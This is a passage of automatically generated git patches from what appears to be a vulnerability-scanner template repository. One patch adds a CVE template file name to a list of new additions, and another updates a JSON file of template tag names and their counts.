From: GitHub Action Date: Fri, 13 May 2022 08:48:14 +0000 Subject: [PATCH 13/68] Auto Generated New Template Addition List [Fri May 13 08:48:14 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c49766a07d..81bcfa9f90 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ cves/2020/CVE-2020-36510.yaml cves/2022/CVE-2022-1040.yaml cves/2022/CVE-2022-1221.yaml cves/2022/CVE-2022-29548.yaml +cves/2022/CVE-2022-30525.yaml exposed-panels/privx-panel.yaml exposed-panels/umbraco-login.yaml exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml From 3dca8ebdd681ff1e2051347482bfba5f7ccd8804 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 May 2022 09:00:25 +0000 Subject: [PATCH 14/68] Auto Generated Templates Stats [Fri May 13 09:00:25 UTC 2022] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 3021 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 1526 insertions(+), 1517 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 59d252c4e4..649fb65dc0 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json 
@@ -1 +1 @@ -{"tags":[{"name":"cve","count":1150},{"name":"panel","count":513},{"name":"lfi","count":460},{"name":"xss","count":363},{"name":"wordpress","count":358},{"name":"exposure","count":292},{"name":"rce","count":289},{"name":"cve2021","count":283},{"name":"tech","count":265},{"name":"wp-plugin","count":259},{"name":"cve2020","count":196},{"name":"","count":188},{"name":"token-spray","count":153},{"name":"joomla","count":131},{"name":"config","count":126},{"name":"apache","count":120},{"name":"cve2018","count":120},{"name":"cve2019","count":118},{"name":"cve2010","count":111},{"name":"default-login","count":109},{"name":"unauth","count":103},{"name":"iot","count":102},{"name":"oast","count":96},{"name":"login","count":85},{"name":"takeover","count":73},{"name":"token","count":72},{"name":"redirect","count":68},{"name":"misconfig","count":65},{"name":"cve2017","count":64},{"name":"sqli","count":62},{"name":"ssrf","count":60},{"name":"file","count":60},{"name":"cve2022","count":59},{"name":"network","count":53},{"name":"oracle","count":50},{"name":"router","count":49},{"name":"wp","count":49},{"name":"cve2016","count":45},{"name":"disclosure","count":45},{"name":"plugin","count":40},{"name":"cve2014","count":37},{"name":"auth-bypass","count":37},{"name":"google","count":36},{"name":"cve2015","count":36},{"name":"authenticated","count":35},{"name":"cisco","count":35},{"name":"logs","count":33},{"name":"atlassian","count":32},{"name":"listing","count":30},{"name":"jira","count":30},{"name":"injection","count":30},{"name":"traversal","count":29},{"name":"devops","count":28},{"name":"generic","count":25},{"name":"kubernetes","count":25},{"name":"oss","count":24},{"name":"adobe","count":24},{"name":"springboot","count":24},{"name":"cms","count":24},{"name":"sap","count":22},{"name":"cnvd","count":22},{"name":"proxy","count":22},{"name":"misc","count":21},{"name":"microsoft","count":21},{"name":"intrusive","count":21},{"name":"aem","count":21},{"name":"vmware","count
":21},{"name":"debug","count":21},{"name":"service","count":20},{"name":"fuzz","count":20},{"name":"cve2012","count":19},{"name":"wp-theme","count":19},{"name":"manageengine","count":19},{"name":"zoho","count":18},{"name":"php","count":18},{"name":"dns","count":18},{"name":"weblogic","count":17},{"name":"tomcat","count":17},{"name":"aws","count":17},{"name":"deserialization","count":17},{"name":"ibm","count":16},{"name":"k8s","count":16},{"name":"cve2011","count":15},{"name":"jenkins","count":15},{"name":"gitlab","count":15},{"name":"dlink","count":15},{"name":"struts","count":15},{"name":"hp","count":14},{"name":"xxe","count":14},{"name":"java","count":14},{"name":"android","count":14},{"name":"api","count":14},{"name":"fileupload","count":14},{"name":"cve2009","count":14},{"name":"ruijie","count":13},{"name":"camera","count":13},{"name":"lfr","count":12},{"name":"status","count":12},{"name":"netsweeper","count":12},{"name":"cve2013","count":12},{"name":"printer","count":12},{"name":"log4j","count":12},{"name":"rails","count":12},{"name":"magento","count":11},{"name":"cnvd2021","count":11},{"name":"netgear","count":11},{"name":"graphql","count":11},{"name":"nginx","count":11},{"name":"firewall","count":11},{"name":"upload","count":11},{"name":"coldfusion","count":10},{"name":"fortigate","count":10},{"name":"spring","count":10},{"name":"grafana","count":10},{"name":"jolokia","count":10},{"name":"airflow","count":10},{"name":"auth","count":10},{"name":"backup","count":10},{"name":"glpi","count":10},{"name":"dell","count":10},{"name":"fastjson","count":9},{"name":"windows","count":9},{"name":"woocommerce","count":9},{"name":"drupal","count":9},{"name":"ftp","count":9},{"name":"mirai","count":9},{"name":"laravel","count":9},{"name":"webserver","count":9},{"name":"github","count":9},{"name":"jndi","count":9},{"name":"fortinet","count":9},{"name":"cve2008","count":9},{"name":"zabbix","count":9},{"name":"django","count":8},{"name":"blind","count":8},{"name":"wso2","count"
:8},{"name":"audit","count":8},{"name":"vcenter","count":8},{"name":"citrix","count":8},{"name":"amazon","count":8},{"name":"phpmyadmin","count":8},{"name":"prometheus","count":8},{"name":"bypass","count":8},{"name":"solr","count":8},{"name":"iis","count":8},{"name":"confluence","count":8},{"name":"azure","count":8},{"name":"metadata","count":8},{"name":"scada","count":8},{"name":"mail","count":7},{"name":"kafka","count":7},{"name":"sonicwall","count":7},{"name":"ssti","count":7},{"name":"firebase","count":7},{"name":"bucket","count":7},{"name":"maps","count":7},{"name":"files","count":7},{"name":"exchange","count":7},{"name":"rconfig","count":7},{"name":"elasticsearch","count":7},{"name":"squirrelmail","count":7},{"name":"kube","count":7},{"name":"python","count":7},{"name":"vpn","count":7},{"name":"firmware","count":6},{"name":"huawei","count":6},{"name":"bigip","count":6},{"name":"jetty","count":6},{"name":"docker","count":6},{"name":"jboss","count":6},{"name":"headless","count":6},{"name":"crlf","count":6},{"name":"magmi","count":6},{"name":"cicd","count":6},{"name":"slack","count":6},{"name":"lucee","count":6},{"name":"druid","count":6},{"name":"enum","count":6},{"name":"backdoor","count":6},{"name":"sitecore","count":6},{"name":"nodejs","count":6},{"name":"ofbiz","count":6},{"name":"cobbler","count":6},{"name":"fpd","count":6},{"name":"cnvd2020","count":6},{"name":"zimbra","count":6},{"name":"go","count":6},{"name":"error","count":5},{"name":"samsung","count":5},{"name":"alibaba","count":5},{"name":"ssl","count":5},{"name":"symfony","count":5},{"name":"setup","count":5},{"name":"apisix","count":5},{"name":"cache","count":5},{"name":"metinfo","count":5},{"name":"strapi","count":5},{"name":"keycloak","count":5},{"name":"circarlife","count":5},{"name":"dedecms","count":5},{"name":"leak","count":5},{"name":"rfi","count":5},{"name":"icewarp","count":5},{"name":"fatpipe","count":5},{"name":"opensis","count":5},{"name":"kubelet","count":5},{"name":"ecology","count":5
},{"name":"symantec","count":5},{"name":"node","count":5},{"name":"rseenet","count":5},{"name":"microweber","count":5},{"name":"ruby","count":5},{"name":"thinkphp","count":5},{"name":"minio","count":5},{"name":"gocd","count":5},{"name":"solarwinds","count":5},{"name":"zhiyuan","count":5},{"name":"moodle","count":5},{"name":"git","count":5},{"name":"artica","count":5},{"name":"storage","count":5},{"name":"websphere","count":4},{"name":"oa","count":4},{"name":"puppet","count":4},{"name":"microstrategy","count":4},{"name":"prestashop","count":4},{"name":"nexus","count":4},{"name":"activemq","count":4},{"name":"gogs","count":4},{"name":"paypal","count":4},{"name":"stripe","count":4},{"name":"hpe","count":4},{"name":"hikvision","count":4},{"name":"sonarqube","count":4},{"name":"kevinlab","count":4},{"name":"flink","count":4},{"name":"hongdian","count":4},{"name":"cloud","count":4},{"name":"kibana","count":4},{"name":"xmlrpc","count":4},{"name":"beyondtrust","count":4},{"name":"terramaster","count":4},{"name":"ognl","count":4},{"name":"wcs","count":4},{"name":"voip","count":4},{"name":"photo","count":4},{"name":"thinkcmf","count":4},{"name":"cve2007","count":4},{"name":"smtp","count":4},{"name":"caucho","count":4},{"name":"mailchimp","count":4},{"name":"hoteldruid","count":4},{"name":"artifactory","count":4},{"name":"zyxel","count":4},{"name":"mongodb","count":4},{"name":"plesk","count":4},{"name":"db","count":4},{"name":"jellyfin","count":4},{"name":"cacti","count":4},{"name":"tikiwiki","count":4},{"name":"elastic","count":4},{"name":"springcloud","count":4},{"name":"awstats","count":4},{"name":"cnvd2019","count":4},{"name":"resin","count":4},{"name":"npm","count":4},{"name":"couchdb","count":4},{"name":"jetbrains","count":4},{"name":"cockpit","count":4},{"name":"ssh","count":4},{"name":"search","count":4},{"name":"panos","count":4},{"name":"buffalo","count":4},{"name":"adminer","count":4},{"name":"asp","count":4},{"name":"aspose","count":4},{"name":"postmessage","count"
:3},{"name":"axis2","count":3},{"name":"trendnet","count":3},{"name":"fortios","count":3},{"name":"circleci","count":3},{"name":"nosqli","count":3},{"name":"log","count":3},{"name":"rlm","count":3},{"name":"dolibarr","count":3},{"name":"sendgrid","count":3},{"name":"nuuo","count":3},{"name":"panabit","count":3},{"name":"seeyon","count":3},{"name":"mcafee","count":3},{"name":"sophos","count":3},{"name":"openbmcs","count":3},{"name":"elfinder","count":3},{"name":"phppgadmin","count":3},{"name":"workspaceone","count":3},{"name":"bitrix","count":3},{"name":"glassfish","count":3},{"name":"database","count":3},{"name":"bruteforce","count":3},{"name":"epson","count":3},{"name":"subrion","count":3},{"name":"smb","count":3},{"name":"linkerd","count":3},{"name":"javascript","count":3},{"name":"concrete","count":3},{"name":"axigen","count":3},{"name":"httpbin","count":3},{"name":"dos","count":3},{"name":"mongo","count":3},{"name":"synology","count":3},{"name":"linkedin","count":3},{"name":"jfrog","count":3},{"name":"telerik","count":3},{"name":"3cx","count":3},{"name":"trixbox","count":3},{"name":"heroku","count":3},{"name":"odoo","count":3},{"name":"centos","count":3},{"name":"selea","count":3},{"name":"axis","count":3},{"name":"empirecms","count":3},{"name":"ebs","count":3},{"name":"geowebserver","count":3},{"name":"samba","count":3},{"name":"cisa","count":3},{"name":"lansweeper","count":3},{"name":"netlify","count":3},{"name":"seagate","count":3},{"name":"lotus","count":3},{"name":"sharepoint","count":3},{"name":"consul","count":3},{"name":"vrealize","count":3},{"name":"wordfence","count":3},{"name":"targa","count":3},{"name":"linksys","count":3},{"name":"openemr","count":3},{"name":"voipmonitor","count":3},{"name":"facebook","count":3},{"name":"prtg","count":3},{"name":"sql","count":3},{"name":"aptus","count":3},{"name":"openam","count":3},{"name":"dreambox","count":3},{"name":"exposures","count":3},{"name":"hashicorp","count":3},{"name":"jamf","count":3},{"name":"httpd","
count":3},{"name":"globalprotect","count":3},{"name":"sugarcrm","count":3},{"name":"splunk","count":3},{"name":"ems","count":3},{"name":"pentaho","count":3},{"name":"ampps","count":3},{"name":"oauth","count":3},{"name":"graph","count":3},{"name":"movable","count":3},{"name":"square","count":3},{"name":"actuator","count":3},{"name":"thinfinity","count":3},{"name":"zeroshell","count":3},{"name":"webadmin","count":3},{"name":"fanruan","count":3},{"name":"jeesns","count":3},{"name":"fuelcms","count":3},{"name":"grav","count":3},{"name":"messaging","count":3},{"name":"kentico","count":3},{"name":"vbulletin","count":3},{"name":"nacos","count":3},{"name":"redis","count":3},{"name":"openssh","count":3},{"name":"horizon","count":3},{"name":"kingsoft","count":3},{"name":"phpinfo","count":3},{"name":"exacqvision","count":2},{"name":"tapestry","count":2},{"name":"key","count":2},{"name":"gitbook","count":2},{"name":"rancher","count":2},{"name":"konga","count":2},{"name":"pascom","count":2},{"name":"cve2006","count":2},{"name":"nextcloud","count":2},{"name":"node-red-dashboard","count":2},{"name":"jmx","count":2},{"name":"cloudinary","count":2},{"name":"ericsson","count":2},{"name":"livezilla","count":2},{"name":"bigant","count":2},{"name":"harbor","count":2},{"name":"showdoc","count":2},{"name":"webmin","count":2},{"name":"zte","count":2},{"name":"projectsend","count":2},{"name":"netscaler","count":2},{"name":"places","count":2},{"name":"zzzcms","count":2},{"name":"kong","count":2},{"name":"jeedom","count":2},{"name":"dvwa","count":2},{"name":"cloudflare","count":2},{"name":"ametys","count":2},{"name":"mantisbt","count":2},{"name":"seowon","count":2},{"name":"netdata","count":2},{"name":"intellian","count":2},{"name":"embed","count":2},{"name":"casdoor","count":2},{"name":"accela","count":2},{"name":"typo3","count":2},{"name":"gitea","count":2},{"name":"versa","count":2},{"name":"tileserver","count":2},{"name":"bigbluebutton","count":2},{"name":"code42","count":2},{"name":"tidb
","count":2},{"name":"azkaban","count":2},{"name":"frontpage","count":2},{"name":"gespage","count":2},{"name":"ucmdb","count":2},{"name":"lantronix","count":2},{"name":"natshell","count":2},{"name":"netis","count":2},{"name":"sequoiadb","count":2},{"name":"emqx","count":2},{"name":"hasura","count":2},{"name":"ranger","count":2},{"name":"auerswald","count":2},{"name":"couchbase","count":2},{"name":"supermicro","count":2},{"name":"conductor","count":2},{"name":"detect","count":2},{"name":"craftcms","count":2},{"name":"alienvault","count":2},{"name":"glances","count":2},{"name":"rocketchat","count":2},{"name":"myfactory","count":2},{"name":"totemomail","count":2},{"name":"digitalrebar","count":2},{"name":"tableau","count":2},{"name":"guacamole","count":2},{"name":"pcoip","count":2},{"name":"commax","count":2},{"name":"seacms","count":2},{"name":"mailgun","count":2},{"name":"csrf","count":2},{"name":"watchguard","count":2},{"name":"pam","count":2},{"name":"ebook","count":2},{"name":"backups","count":2},{"name":"jitsi","count":2},{"name":"avantfax","count":2},{"name":"dynamicweb","count":2},{"name":"apereo","count":2},{"name":"openwrt","count":2},{"name":"rackstation","count":2},{"name":"cyberoam","count":2},{"name":"mbean","count":2},{"name":"sysaid","count":2},{"name":"akkadian","count":2},{"name":"waf","count":2},{"name":"maian","count":2},{"name":"webcam","count":2},{"name":"pgadmin","count":2},{"name":"ixcache","count":2},{"name":"mysql","count":2},{"name":"rstudio","count":2},{"name":"qihang","count":2},{"name":"ansible","count":2},{"name":"javamelody","count":2},{"name":"frp","count":2},{"name":"chyrp","count":2},{"name":"fortimail","count":2},{"name":"owasp","count":2},{"name":"s3","count":2},{"name":"erxes","count":2},{"name":"shellshock","count":2},{"name":"liferay","count":2},{"name":"ec2","count":2},{"name":"viewpoint","count":2},{"name":"rackn","count":2},{"name":"kiwitcms","count":2},{"name":"pbootcms","count":2},{"name":"qcubed","count":2},{"name":"cluster
engine","count":2},{"name":"lighttpd","count":2},{"name":"electron","count":2},{"name":"pega","count":2},{"name":"aruba","count":2},{"name":"digitalocean","count":2},{"name":"emerge","count":2},{"name":"globaldomains","count":2},{"name":"dotnetnuke","count":2},{"name":"bitly","count":2},{"name":"circontrol","count":2},{"name":"chiyu","count":2},{"name":"cve2005","count":2},{"name":"otobo","count":2},{"name":"redash","count":2},{"name":"gradle","count":2},{"name":"avaya","count":2},{"name":"zerof","count":2},{"name":"motorola","count":2},{"name":"openstack","count":2},{"name":"influxdb","count":2},{"name":"tenda","count":2},{"name":"ruckus","count":2},{"name":"mobileiron","count":2},{"name":"alfresco","count":2},{"name":"umbraco","count":2},{"name":"appcms","count":2},{"name":"nextjs","count":2},{"name":"hubspot","count":2},{"name":"fortiweb","count":2},{"name":"yapi","count":2},{"name":"plastic","count":2},{"name":"graphite","count":2},{"name":"phpshowtime","count":2},{"name":"ivanti","count":2},{"name":"octoprint","count":2},{"name":"jsf","count":2},{"name":"neos","count":2},{"name":"cas","count":2},{"name":"shenyu","count":2},{"name":"proftpd","count":2},{"name":"intercom","count":2},{"name":"airtame","count":2},{"name":"vidyo","count":2},{"name":"syslog","count":2},{"name":"apollo","count":2},{"name":"rosariosis","count":2},{"name":"cgi","count":2},{"name":"homematic","count":2},{"name":"resourcespace","count":2},{"name":"getsimple","count":2},{"name":"akamai","count":2},{"name":"sdwan","count":2},{"name":"impresscms","count":2},{"name":"filemanager","count":2},{"name":"domxss","count":2},{"name":"terraform","count":2},{"name":"cocoon","count":2},{"name":"hjtcloud","count":2},{"name":"kafdrop","count":2},{"name":"yii","count":2},{"name":"dotcms","count":2},{"name":"mida","count":2},{"name":"twitter","count":2},{"name":"sqlite","count":2},{"name":"pacsone","count":2},{"name":"ambari","count":2},{"name":"hadoop","count":2},{"name":"forcepoint","count":2},{"name":"i
top","count":2},{"name":"ecoa","count":2},{"name":"traefik","count":2},{"name":"xweb500","count":2},{"name":"metabase","count":2},{"name":"ovirt","count":2},{"name":"listserv","count":2},{"name":"sentry","count":2},{"name":"gophish","count":2},{"name":"matrix","count":2},{"name":"igs","count":2},{"name":"wamp","count":2},{"name":"avtech","count":2},{"name":"wooyun","count":2},{"name":"idrac","count":2},{"name":"payara","count":2},{"name":"thruk","count":2},{"name":"netsus","count":2},{"name":"phpcollab","count":2},{"name":"orchid","count":2},{"name":"hostheader-injection","count":2},{"name":"password","count":2},{"name":"labkey","count":2},{"name":"servicenow","count":2},{"name":"saltstack","count":2},{"name":"nagios","count":2},{"name":"openfire","count":2},{"name":"bmc","count":2},{"name":"pfsense","count":2},{"name":"hiveos","count":2},{"name":"flightpath","count":2},{"name":"middleware","count":2},{"name":"ilo","count":2},{"name":"sidekiq","count":2},{"name":"openvpn","count":2},{"name":"justwriting","count":2},{"name":"netflix","count":2},{"name":"text","count":2},{"name":"acrolinx","count":2},{"name":"iptime","count":2},{"name":"seeddms","count":2},{"name":"weather","count":2},{"name":"swagger","count":2},{"name":"gitlist","count":2},{"name":"rockmongo","count":2},{"name":"xxljob","count":2},{"name":"idea","count":2},{"name":"wuzhicms","count":2},{"name":"horde","count":2},{"name":"skycaiji","count":2},{"name":"smartstore","count":2},{"name":"ghost","count":2},{"name":"phpstorm","count":2},{"name":"bomgar","count":2},{"name":"pulse","count":2},{"name":"favicon","count":2},{"name":"checkpoint","count":2},{"name":"rabbitmq","count":2},{"name":"jquery","count":2},{"name":"xerox","count":2},{"name":"virtualui","count":2},{"name":"tongda","count":2},{"name":"nasos","count":2},{"name":"codeigniter","count":2},{"name":"dubbo","count":2},{"name":"flir","count":2},{"name":"sangfor","count":2},{"name":"ad","count":2},{"name":"metersphere","count":2},{"name":"linux","cou
nt":2},{"name":"spark","count":2},{"name":"aviatrix","count":2},{"name":"arcgis","count":2},{"name":"docs","count":2},{"name":"chamilo","count":2},{"name":"zblogphp","count":2},{"name":"argussurveillance","count":1},{"name":"acexy","count":1},{"name":"launchdarkly","count":1},{"name":"tensorboard","count":1},{"name":"webpconverter","count":1},{"name":"eventtickets","count":1},{"name":"karma","count":1},{"name":"nsasg","count":1},{"name":"elementor","count":1},{"name":"axxonsoft","count":1},{"name":"graphiql","count":1},{"name":"jumpcloud","count":1},{"name":"bolt","count":1},{"name":"ignition","count":1},{"name":"dvr","count":1},{"name":"ulterius","count":1},{"name":"zm","count":1},{"name":"cybrotech","count":1},{"name":"netbiblio","count":1},{"name":"nedi","count":1},{"name":"yaws","count":1},{"name":"netmask","count":1},{"name":"wago","count":1},{"name":"teltonika","count":1},{"name":"exponentcms","count":1},{"name":"uwsgi","count":1},{"name":"fleet","count":1},{"name":"nordex","count":1},{"name":"upnp","count":1},{"name":"chinaunicom","count":1},{"name":"piwigo","count":1},{"name":"fatwire","count":1},{"name":"mautic","count":1},{"name":"zoneminder","count":1},{"name":"mpsec","count":1},{"name":"gsm","count":1},{"name":"quip","count":1},{"name":"qizhi","count":1},{"name":"novnc","count":1},{"name":"orbintelligence","count":1},{"name":"gateway","count":1},{"name":"leostream","count":1},{"name":"rujjie","count":1},{"name":"redmine","count":1},{"name":"beanshell","count":1},{"name":"europeana","count":1},{"name":"securepoint","count":1},{"name":"wdja","count":1},{"name":"superset","count":1},{"name":"lg-nas","count":1},{"name":"smartblog","count":1},{"name":"ldap","count":1},{"name":"formalms","count":1},{"name":"xvr","count":1},{"name":"landrayoa","count":1},{"name":"clickhouse","count":1},{"name":"richfaces","count":1},{"name":"yzmcms","count":1},{"name":"lanproxy","count":1},{"name":"yachtcontrol","count":1},{"name":"glowroot","count":1},{"name":"binance","count"
:1},{"name":"dotclear","count":1},{"name":"incapptic-connect","count":1},{"name":"kerio","count":1},{"name":"eprints","count":1},{"name":"u8","count":1},{"name":"emc","count":1},{"name":"google-earth","count":1},{"name":"mofi","count":1},{"name":"jeewms","count":1},{"name":"siebel","count":1},{"name":"xmpp","count":1},{"name":"synnefo","count":1},{"name":"route","count":1},{"name":"apos","count":1},{"name":"interactsh","count":1},{"name":"sgp","count":1},{"name":"powercreator","count":1},{"name":"distance","count":1},{"name":"twitter-server","count":1},{"name":"tplink","count":1},{"name":"zms","count":1},{"name":"streetview","count":1},{"name":"connect-central","count":1},{"name":"ipvpn","count":1},{"name":"trello","count":1},{"name":"siemens","count":1},{"name":"primetek","count":1},{"name":"saml","count":1},{"name":"gloo","count":1},{"name":"purestorage","count":1},{"name":"pinata","count":1},{"name":"version","count":1},{"name":"slstudio","count":1},{"name":"gnuboard","count":1},{"name":"wavemaker","count":1},{"name":"ucp","count":1},{"name":"kubeflow","count":1},{"name":"wazuh","count":1},{"name":"timesheet","count":1},{"name":"ntopng","count":1},{"name":"pagespeed","count":1},{"name":"youtube","count":1},{"name":"rijksmuseum","count":1},{"name":"caddy","count":1},{"name":"asus","count":1},{"name":"revslider","count":1},{"name":"cve2000","count":1},{"name":"geddy","count":1},{"name":"aspnuke","count":1},{"name":"leanix","count":1},{"name":"cucm","count":1},{"name":"fortressaircraft","count":1},{"name":"ubnt","count":1},{"name":"pippoint","count":1},{"name":"siteomat","count":1},{"name":"calendarific","count":1},{"name":"asana","count":1},{"name":"web3storage","count":1},{"name":"dnn","count":1},{"name":"gcp","count":1},{"name":"trane","count":1},{"name":"stackstorm","count":1},{"name":"mastodon","count":1},{"name":"sofneta","count":1},{"name":"nerdgraph","count":1},{"name":"block","count":1},{"name":"bing","count":1},{"name":"routeros","count":1},{"name":"soar",
"count":1},{"name":"couchcms","count":1},{"name":"piluscart","count":1},{"name":"rubedo","count":1},{"name":"discord","count":1},{"name":"inspur","count":1},{"name":"remkon","count":1},{"name":"shindig","count":1},{"name":"qsan","count":1},{"name":"htmli","count":1},{"name":"beanstalk","count":1},{"name":"pods","count":1},{"name":"blockchain","count":1},{"name":"edgeos","count":1},{"name":"mirasys","count":1},{"name":"tink","count":1},{"name":"onelogin","count":1},{"name":"trilithic","count":1},{"name":"opensso","count":1},{"name":"zcms","count":1},{"name":"tensorflow","count":1},{"name":"loytec","count":1},{"name":"webctrl","count":1},{"name":"xoops","count":1},{"name":"qdpm","count":1},{"name":"fastly","count":1},{"name":"bigfix","count":1},{"name":"lancom","count":1},{"name":"extreme","count":1},{"name":"mspcontrol","count":1},{"name":"gateone","count":1},{"name":"pivotaltracker","count":1},{"name":"webmail","count":1},{"name":"librenms","count":1},{"name":"webalizer","count":1},{"name":"rsyncd","count":1},{"name":"cloudron","count":1},{"name":"spf","count":1},{"name":"jupyterhub","count":1},{"name":"dbeaver","count":1},{"name":"dwr","count":1},{"name":"arl","count":1},{"name":"dribbble","count":1},{"name":"alerta","count":1},{"name":"biometrics","count":1},{"name":"smi","count":1},{"name":"thinkserver","count":1},{"name":"ecosys","count":1},{"name":"faraday","count":1},{"name":"eyelock","count":1},{"name":"overflow","count":1},{"name":"twig","count":1},{"name":"matomo","count":1},{"name":"whm","count":1},{"name":"micro","count":1},{"name":"concrete5","count":1},{"name":"buildbot","count":1},{"name":"placeos","count":1},{"name":"csrfguard","count":1},{"name":"goip","count":1},{"name":"cassandra","count":1},{"name":"aims","count":1},{"name":"testrail","count":1},{"name":"superwebmailer","count":1},{"name":"thinkadmin","count":1},{"name":"kindeditor","count":1},{"name":"timezone","count":1},{"name":"cx","count":1},{"name":"istat","count":1},{"name":"jsp","count":1}
,{"name":"veeam","count":1},{"name":"netbeans","count":1},{"name":"getgrav","count":1},{"name":"concourse","count":1},{"name":"festivo","count":1},{"name":"opencart","count":1},{"name":"etherpad","count":1},{"name":"jenkin","count":1},{"name":"dss","count":1},{"name":"maxsite","count":1},{"name":"web-suite","count":1},{"name":"jinher","count":1},{"name":"svn","count":1},{"name":"sureline","count":1},{"name":"rwebserver","count":1},{"name":"webeditors","count":1},{"name":"postmark","count":1},{"name":"alquist","count":1},{"name":"easyappointments","count":1},{"name":"duomicms","count":1},{"name":"hetzner","count":1},{"name":"redwood","count":1},{"name":"openweather","count":1},{"name":"bitcoinaverage","count":1},{"name":"thecatapi","count":1},{"name":"grails","count":1},{"name":"helpdesk","count":1},{"name":"securenvoy","count":1},{"name":"polarisft","count":1},{"name":"adminset","count":1},{"name":"iceflow","count":1},{"name":"autocomplete","count":1},{"name":"locations","count":1},{"name":"gridx","count":1},{"name":"discourse","count":1},{"name":"ssltls","count":1},{"name":"asanhamayesh","count":1},{"name":"webex","count":1},{"name":"phoronix","count":1},{"name":"pirelli","count":1},{"name":"solarlog","count":1},{"name":"b2evolution","count":1},{"name":"vnc","count":1},{"name":"gpon","count":1},{"name":"apiman","count":1},{"name":"guppy","count":1},{"name":"racksnet","count":1},{"name":"netrc","count":1},{"name":"ioncube","count":1},{"name":"mdm","count":1},{"name":"satellian","count":1},{"name":"idor","count":1},{"name":"oidc","count":1},{"name":"rhymix","count":1},{"name":"tinypng","count":1},{"name":"szhe","count":1},{"name":"pypicloud","count":1},{"name":"buddy","count":1},{"name":"gocron","count":1},{"name":"spinnaker","count":1},{"name":"defectdojo","count":1},{"name":"micro-user-service","count":1},{"name":"intellislot","count":1},{"name":"amcrest","count":1},{"name":"roads","count":1},{"name":"eyoucms","count":1},{"name":"optiLink","count":1},{"name":"smart
sense","count":1},{"name":"phabricator","count":1},{"name":"yishaadmin","count":1},{"name":"tugboat","count":1},{"name":"alchemy","count":1},{"name":"spectracom","count":1},{"name":"csa","count":1},{"name":"dolphinscheduler","count":1},{"name":"boa","count":1},{"name":"omi","count":1},{"name":"drone","count":1},{"name":"weiphp","count":1},{"name":"flask","count":1},{"name":"atvise","count":1},{"name":"lutron","count":1},{"name":"tectuus","count":1},{"name":"droneci","count":1},{"name":"cherokee","count":1},{"name":"opensns","count":1},{"name":"diris","count":1},{"name":"memcached","count":1},{"name":"etcd","count":1},{"name":"announcekit","count":1},{"name":"bash","count":1},{"name":"malwarebazaar","count":1},{"name":"express","count":1},{"name":"yarn","count":1},{"name":"ptr","count":1},{"name":"feifeicms","count":1},{"name":"sarg","count":1},{"name":"oneblog","count":1},{"name":"cvnd2018","count":1},{"name":"geocode","count":1},{"name":"kenesto","count":1},{"name":"tufin","count":1},{"name":"netgenie","count":1},{"name":"redhat","count":1},{"name":"imap","count":1},{"name":"foss","count":1},{"name":"moin","count":1},{"name":"natemail","count":1},{"name":"acsoft","count":1},{"name":"bible","count":1},{"name":"keenetic","count":1},{"name":"browserless","count":1},{"name":"klog","count":1},{"name":"pmb","count":1},{"name":"totolink","count":1},{"name":"ucs","count":1},{"name":"sucuri","count":1},{"name":"lokalise","count":1},{"name":"74cms","count":1},{"name":"details","count":1},{"name":"krweb","count":1},{"name":"pulsesecure","count":1},{"name":"lotuscms","count":1},{"name":"burp","count":1},{"name":"livehelperchat","count":1},{"name":"svnserve","count":1},{"name":"fedora","count":1},{"name":"secnet-ac","count":1},{"name":"codemeter","count":1},{"name":"fms","count":1},{"name":"gsoap","count":1},{"name":"chevereto","count":1},{"name":"hanming","count":1},{"name":"dbt","count":1},{"name":"mdb","count":1},{"name":"sourcecodester","count":1},{"name":"vsphere","count":
1},{"name":"zarafa","count":1},{"name":"zipkin","count":1},{"name":"deviantart","count":1},{"name":"unifi","count":1},{"name":"ricoh","count":1},{"name":"dwsync","count":1},{"name":"dreamweaver","count":1},{"name":"sonarcloud","count":1},{"name":"office365","count":1},{"name":"contentkeeper","count":1},{"name":"monitorr","count":1},{"name":"bonita","count":1},{"name":"gurock","count":1},{"name":"tcexam","count":1},{"name":"contactform","count":1},{"name":"hdnetwork","count":1},{"name":"nuxeo","count":1},{"name":"f5","count":1},{"name":"admidio","count":1},{"name":"lfw","count":1},{"name":"wallix","count":1},{"name":"clansphere","count":1},{"name":"antsword","count":1},{"name":"okiko","count":1},{"name":"visualtools","count":1},{"name":"cofense","count":1},{"name":"fhem","count":1},{"name":"manager","count":1},{"name":"hirak","count":1},{"name":"domino","count":1},{"name":"faust","count":1},{"name":"majordomo2","count":1},{"name":"argocd","count":1},{"name":"loqate","count":1},{"name":"cooperhewitt","count":1},{"name":"bookstack","count":1},{"name":"processwire","count":1},{"name":"virustotal","count":1},{"name":"nexusdb","count":1},{"name":"vercel","count":1},{"name":"floc","count":1},{"name":"shadoweb","count":1},{"name":"goahead","count":1},{"name":"primefaces","count":1},{"name":"ixbusweb","count":1},{"name":"qualcomm","count":1},{"name":"magicflow","count":1},{"name":"skywalking","count":1},{"name":"anchorcms","count":1},{"name":"nweb2fax","count":1},{"name":"razor","count":1},{"name":"intellect","count":1},{"name":"panasonic","count":1},{"name":"basic-auth","count":1},{"name":"malshare","count":1},{"name":"cloudera","count":1},{"name":"sar2html","count":1},{"name":"esmtp","count":1},{"name":"abbott","count":1},{"name":"emlog","count":1},{"name":"dompdf","count":1},{"name":"newrelic","count":1},{"name":"blue-ocean","count":1},{"name":"visionhub","count":1},{"name":"weboftrust","count":1},{"name":"cliniccases","count":1},{"name":"chronoforums","count":1},{"name":
